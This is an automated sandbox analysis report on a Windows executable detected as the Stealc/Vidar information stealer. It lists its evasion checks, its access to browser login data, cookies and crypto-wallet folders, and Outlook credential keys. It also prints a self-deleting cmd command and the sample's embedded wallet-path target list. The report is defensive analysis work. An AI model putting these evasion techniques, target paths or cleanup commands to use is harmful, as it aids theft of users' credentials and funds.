Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Process created: "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\B7VbZC8QLf.exe" & del "C:\ProgramData\*.dll"" & exit			Jump to behavior

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

0_2_0040DE01

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-6964

Source: C:\Windows\SysWOW64\timeout.exe TID: 3232

Thread sleep count: 41 > 30

Jump to behavior

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

Evasive API call chain: GetSystemTime,DecisionNodes

graph_0-8849

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

Code function: 0_2_0040D271 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040D351h

0_2_0040D271

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

Code function: 0_2_00409283 GetProcessHeap,RtlAllocateHeap,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentProcess,IsWow64Process,GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,GetUserDefaultLocaleName,LocalAlloc,CharToOemW,GetSystemPowerStatus,GetCurrentProcessId,OpenProcess,K32GetModuleFileNameExA,CloseHandle,GetProcessHeap,RtlAllocateHeap,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,wsprintfA,GetProcessHeap,RtlAllocateHeap,GlobalMemoryStatusEx,wsprintfA,GetProcessHeap,RtlAllocateHeap,wsprintfA,lstrlen,

0_2_00409283

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Code function: 0_2_0040A802 strtok_s,wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_0040A802
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Code function: 0_2_00401010 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00401010
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Code function: 0_2_00406218 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_00406218
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Code function: 0_2_0040AC23 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_0040AC23
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Code function: 0_2_00407D25 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_00407D25
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Code function: 0_2_0040B4FA wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040B4FA
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Code function: 0_2_004075DC FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_004075DC
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Code function: 0_2_004001F6 FindFirstFileA,	0_2_004001F6
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Code function: 0_2_0040B1A3 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_0040B1A3
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Code function: 0_2_004078B3 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_004078B3

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	API call chain: ExitProcess graph end node	graph_0-6966
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	API call chain: ExitProcess graph end node	graph_0-7942
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	API call chain: ExitProcess graph end node	graph_0-6985

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior

Source: B7VbZC8QLf.exe, 00000000.00000002.351827343.0000000000972000.00000004.00000020.00020000.00000000.sdmp, B7VbZC8QLf.exe, 00000000.00000002.351827343.0000000000929000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: B7VbZC8QLf.exe, 00000000.00000002.352104857.00000000023F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

0_2_0040DE01

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

Code function: 0_2_00403657 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

0_2_00403657

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

Code function: 0_2_0040DE01 mov eax, dword ptr fs:[00000030h]

0_2_0040DE01

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\B7VbZC8QLf.exe" & del "C:\ProgramData\*.dll"" & exit			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5			Jump to behavior

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_0040D271

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

0_2_00409283

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

0_2_00409283

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

Code function: 0_2_0040D204 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_0040D204

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.352104857.00000000023F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B7VbZC8QLf.exe PID: 2492, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: B7VbZC8QLf.exe PID: 2492, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior

Found many strings related to Crypto-Wallets (likely being stolen)

Source: B7VbZC8QLf.exe, 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\Session Storage\\|.*\|0\|
Source: B7VbZC8QLf.exe	String found in binary or memory: \ElectronCash\wallets\
Source: B7VbZC8QLf.exe, 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\Session Storage\\|.*\|0\|
Source: B7VbZC8QLf.exe	String found in binary or memory: Jaxx Liberty
Source: B7VbZC8QLf.exe	String found in binary or memory: window-state.json
Source: B7VbZC8QLf.exe, 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\Session Storage\\|.*\|0\|
Source: B7VbZC8QLf.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: B7VbZC8QLf.exe, 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\Session Storage\\|.*\|0\|
Source: B7VbZC8QLf.exe, 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\Session Storage\\|.*\|0\|
Source: B7VbZC8QLf.exe	String found in binary or memory: passphrase.json
Source: B7VbZC8QLf.exe	String found in binary or memory: \jaxx\Local Storage\
Source: B7VbZC8QLf.exe, 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\Session Storage\\|.*\|0\|
Source: B7VbZC8QLf.exe	String found in binary or memory: Exodus
Source: B7VbZC8QLf.exe	String found in binary or memory: file__0.localstorage
Source: B7VbZC8QLf.exe, 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\Session Storage\\|.*\|0\|
Source: B7VbZC8QLf.exe	String found in binary or memory: \MultiDoge\
Source: B7VbZC8QLf.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: B7VbZC8QLf.exe, 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\Session Storage\\|.*\|0\|
Source: B7VbZC8QLf.exe, 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\Session Storage\\|.*\|0\|
Source: B7VbZC8QLf.exe, 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\Session Storage\\|.*\|0\|

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Source: Yara match	File source: 0.2.B7VbZC8QLf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.B7VbZC8QLf.exe.8a0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.351827343.0000000000972000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B7VbZC8QLf.exe PID: 2492, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.352104857.00000000023F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B7VbZC8QLf.exe PID: 2492, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: B7VbZC8QLf.exe PID: 2492, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	12 Native API	Path Interception	11 Process Injection	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 System Time Discovery	Remote Services	3 Data from Local System	Exfiltration Over Other Network Medium	12 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Obfuscated Files or Information	1 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Email Collection	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
